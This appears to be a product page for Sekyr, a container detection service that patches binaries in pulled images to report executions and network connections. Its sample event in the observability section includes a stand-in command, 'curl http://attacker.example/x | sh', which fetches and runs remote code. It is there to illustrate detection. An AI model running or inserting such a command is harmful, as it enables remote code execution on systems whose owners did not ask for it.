01
Architecture

Where Sekyr sits.

A pull-through proxy that sits between your orchestrator and the upstream registry. You still push images to your own registry; your orchestrator pulls them through us. On first pull we analyze the image, patch every ELF binary we find, and ship the result back with one extra layer on top of the original. Repeat pulls hit the cache and pass through unchanged.

UPSTREAMImage registryghcr · ECR · Hub · GARunmodifiedSEKYR · pull-through cachescanfind ELF binariespatchadd observation codeto ELF binariesoverlay+1 layer · reportercachecontent-addressedCONTROL PLANE · sekyr.cloudanalysis · search · alertingbehavioural detection over the event streamYOUR CLUSTERorchestratork8s · ECS · Nomadworkload-1image + patched-bin layerworkload-2image + patched-bin layerworkload-3image + patched-bin layerpulldeliverevents
Pull pathOriginal image + one added layer
Event streamFrom the side reporter, when a patched binary runs
Sekyr surfacePull-through cache + control plane
02
Pull lifecycle

What happens on docker pull.

From the client's perspective, this is a normal OCI pull. Pushes still go to your upstream registry; we never accept them. Inside the cache, four steps run on first pull before the manifest is returned. Repeat pulls of the same digest are a cache hit. We do not touch signatures, do not check provenance against any allowlist, and do not modify your original layers.

  1. 01

    Scan

    Walk the image. Identify every ELF binary inside it: shells, package binaries under /usr/bin, busybox applets, language runtimes, anything that can be exec’d.

  2. 02

    Patch

    Add a small observation routine to each ELF binary in the image. The routine sits dormant until the binary is executed; when it is, the routine wakes up alongside the binary and forks a small reporter side-process that emits one event and exits.

  3. 03

    Overlay

    Wrap the patched copies and the reporter into a single extra layer on top of the existing image. Original layers are byte-for-byte unchanged. The entrypoint is not rewritten; signatures and provenance are not touched.

  4. 04

    Deliver

    Serve the original image plus our one added layer. Same OCI protocol, same digest verification. Subsequent pulls hit the content-addressed cache.

03
Runtime lifecycle

What runs at runtime. Almost nothing.

Sekyr is agentless. There is no daemon on the host, no PID 1 supervisor in the container, no syscall funnel. The patched binaries run as themselves. The execution of one of those binaries IS the event we care about; that is what wakes the observation code and triggers a small reporter side-process fork off, send one event, and exit. Long-running idle workloads cost nothing.

CONTAINERPATCHED BINARY · in the imageruns as itselfexecution wakes the observation codeSIDE REPORTER · transientforked on each execution, exits after sendfork()SEKYR ANALYSIS ENGINEbehavioural analysis · alerting · search
01
ExecContainer starts your original entrypoint, untouched. The entrypoint itself is not patched; it runs exactly as it did before. From there it execs into the binaries inside the image, which is where the hook sites live.
02
HitWhenever a patched binary is executed, our observation code runs with it. The execution itself is the event; there is nothing to look for.
03
ForkThe observation code fork()s a tiny reporter. The parent binary keeps running with no observable delay. The reporter is a separate process, not a thread, not a tracer.
04
ReportThe reporter snapshots the run: binary path, argv, argv[0], parent PID chain back to PID 1, non-sensitive environment, and the network connections currently open for that process. It packages all of it into one event and ships it back to the Sekyr analysis engine. The destination is ours, not your observability stack.
05
ExitReporter exits. No persistent process. No watched file descriptors. Nothing left running until the next patched binary is executed.
06
IdleA workload that is just sitting there, not executing any patched binaries, emits nothing. A long-running service that booted once and is now waiting on I/O is invisible to Sekyr.
04
Coverage

What we listen for.

No profiles, no allowlists, no learning windows. Every patched binary carries the same observation code, and every execution of one of those binaries produces an event with the same shape. What we record is below.

Who is running

For every execution we capture the binary path, argv, argv[0], and the parent PID chain back to PID 1. Command injection shows up here, like a webserver suddenly running /bin/sh -c, a cron spawning curl, or a database forking a shell.

binary pathargvargv[0]parent chain

Network connections

For the same execution, we record the network connections that process has open. Catches workloads reaching addresses they have no business reaching, like exfiltration destinations, C2 endpoints, or internal services they should never touch.

active socketsdestination ip:portprotocol

Process context

Parent PID chain and non-sensitive environment variables go out with each event. Lets you reconstruct who spawned what, even when the chain crosses several short-lived processes.

ppid chainenv (filtered)cwd
What we deliberately skip.We do not trace every syscall. read() / write() / mmap() in steady state are not interesting and are a guaranteed way to burn CPU. We watch the execution of binaries inside your image, which is the actual move an attacker has to make to traverse a system or run a command. It is not a syscall firehose.
05
Observability

One event per hook hit.

Every event has the same shape: what happened, where it was called from, who its parent was. The control plane is a search and alerting view over those events.

{
  "ts": "2026-04-26T14:22:08.412Z",
  "workload": "api-7f9c8d6b4-x2k7l",
  "image": "sekyr.cloud/ghcr/acme/api@sha256:f9c8d6b4...",
  "event": "process.exec",
  "exec": {
    "path": "/bin/sh",
    "argv": ["sh", "-c", "curl http://attacker.example/x | sh"],
    "cwd": "/app"
  },
  "parents": [
    { "pid": 412, "comm": "sh",     "exe": "/bin/sh" },
    { "pid": 411, "comm": "node",   "exe": "/usr/local/bin/node" },
    { "pid": 1,   "comm": "node",   "exe": "/usr/local/bin/node" }
  ],
  "env_safe": { "NODE_ENV": "production", "PORT": "8080" },
  "site": { "binary": "/usr/local/bin/node", "offset": "0x4f12" }
}
Where events go

Reporters ship events to the Sekyr analysis engine. We filter aggressively at ingest and deduplicate events we have already seen for the same image and call site, so only real, novel signals enter the analysis pipeline. We run the behavioural detection on top, so you don’t pipe the raw stream into your own SIEM and you don’t hand-write detection rules. Findings surface in the control plane and via webhooks or the alerting destination of your choice.

06
Performance

What this costs you. Almost nothing, most of the time.

The honest version: we don't have hard numbers to publish yet, but the shape of the cost is structural, not a tuning exercise. Here is where it sits relative to the alternatives.

01
Idle workloads cost zero.No agent, no daemon, no syscall funnel. If no patched binary is executed, no event is produced and no work is done. Long-running services that booted once and are now waiting on I/O are invisible to Sekyr.
02
You pay per image conversion, not per pull.Patching an image costs CPU once, when a new tag goes through Sekyr the first time. Repeat pulls of that digest hit the cache and are free. Your bill grows with the number of distinct images you ship, not with how many pods you run them in.
03
Materially lower overhead than agent + eBPF setups.Traditional container monitors run a privileged daemon on every host, attach eBPF programs on every node, and process every syscall on every container, whether or not it matters. That cost is constant and grows with your fleet. Sekyr only spends CPU when a patched binary is actually executed, and the analysis side filters and deduplicates aggressively before anything reaches a paid path.
04
Pull-time cost is a one-shot.Scanning and patching the image happens once, server-side, in the cache. After that it is a normal cached pull. You wear the cost on first pull of a new tag, never on container start.
05
No host kernel state.No kernel modules. No eBPF programs loaded into your kernel. No privileged daemonsets. We cannot leak memory in a place you can’t restart, because we are not in your host.
07
Compatibility

What we run on.

Sekyr speaks OCI on the pull path. You keep using your existing registry for pushes; if it implements the OCI Distribution Spec on read and your runtime implements OCI Runtime Spec, Sekyr fits in front of it.

Registries
  • Docker Hub tested
  • GitHub Container Registry tested
  • AWS ECR tested
  • Google Artifact Registry tested
  • GitLab Container Registry tested
  • Harbor compatible
  • Quay.io compatible
  • Self-hosted (any OCI dist) compatible
Orchestrators
  • Kubernetes 1.24+ tested
  • Amazon ECS tested
  • Nomad 1.6+ compatible
  • Docker / Compose tested
  • OpenShift 4.x compatible
Architectures
  • linux/amd64 tested
  • linux/arm64 tested
  • linux/arm/v7 compatible
  • Distroless base images tested
  • Alpine / musl tested
  • Scratch images tested
08
Threat model

Detection, not enforcement.

Sekyr is detection-only. We do not block, kill, or interfere with your workload; we just report. The list below is what we actually catch from observing binary executions, and what we deliberately don’t.

What we catch
  • Command injection, where a process execs a shell with attacker-controlled argv
  • Lateral movement, where workloads reach internal services they’ve never touched
  • Suspicious exec chains, like webserver → sh → curl → sh, or other anomalous parents
  • Unexpected outbound network dials to exfiltration destinations or C2 callbacks
  • Living-off-the-land, where busybox or coreutils binaries get used inside an image that doesn’t normally need them
  • Crypto-miner drop and run, where short-lived exec patterns betray payload delivery
What we don’t do
  • We do not block, kill, or signal processes. Detection only.
  • We do not catch attacks that never exec a binary or open a socket, so pure in-process memory corruption is invisible to us
  • We do not see statically-linked binaries the cache wasn’t able to identify (rare, but possible)
  • We do not protect against kernel-level exploits or rootkits; that is the host’s job
  • We do not stop build-time supply chain attacks before the image reaches the registry
  • We do not defend against malicious insiders with cluster-admin and event-pipeline rights
09
Comparison

Sekyr vs eBPF / agent-based container monitors.

Falco-style stacks put a privileged agent on every host and watch the kernel. We put the hooks inside the image, only spend CPU when something interesting actually happens, and let the analysis side filter and deduplicate before anything else. Different place to stand, different cost shape.

Our approach

Sekyr

Detection inside the image

Falco-style stacks

eBPF + agent monitors

A daemon on every host, in the kernel

Where it runsThe point in the stack it lives in
Inside your image, as patched binaries + a transient reporter
On every host, as a privileged daemon + eBPF programs in the kernel
When it runsWhen CPU time is actually spent
Only when a patched binary is executed inside a workload
Continuously, on every syscall in every container, whether interesting or not
Idle workload costA quiet container doing nothing exotic
Effectively zero, with no daemon and no agent
Constant baseline overhead from the daemon and probes
CoverageWhat you have to install per node
Pull the image. Done.
Daemonset + privileged agent on every node, kept current
Kernel footprintWhat lands in the host kernel
None. Userspace patches inside your image only.
eBPF programs attached to kernel hooks; kernel version sensitivity
Detection surfaceWhere the hooks live
Every ELF binary inside the image: shells, busybox applets, /usr/bin/*, language runtimes (the entrypoint itself is left alone)
The host kernel, which sees everything, including things you don’t care about
Failure modeWhat happens when it breaks
Workload runs as the original; events stop flowing
Daemon crashes, probes detach; detection silently degrades on that node
What it sends homeThe data shape on the wire
One event per execution: who ran, parent chain, active network connections. Not a syscall firehose.
A configurable but typically large stream of syscall events to filter downstream
eBPF stands for Extended Berkeley Packet Filter. A way to attach small programs to kernel hooks. Powerful and ubiquitous; also constant overhead and kernel-version sensitive.Agent is a long-running, usually privileged process per host. Has to be installed, kept current, and trusted with elevated permissions.
Try it

Read the docs. Pull an image. See what it does.

Start a free trial. No agent install, no orchestrator changes beyond a URL prefix.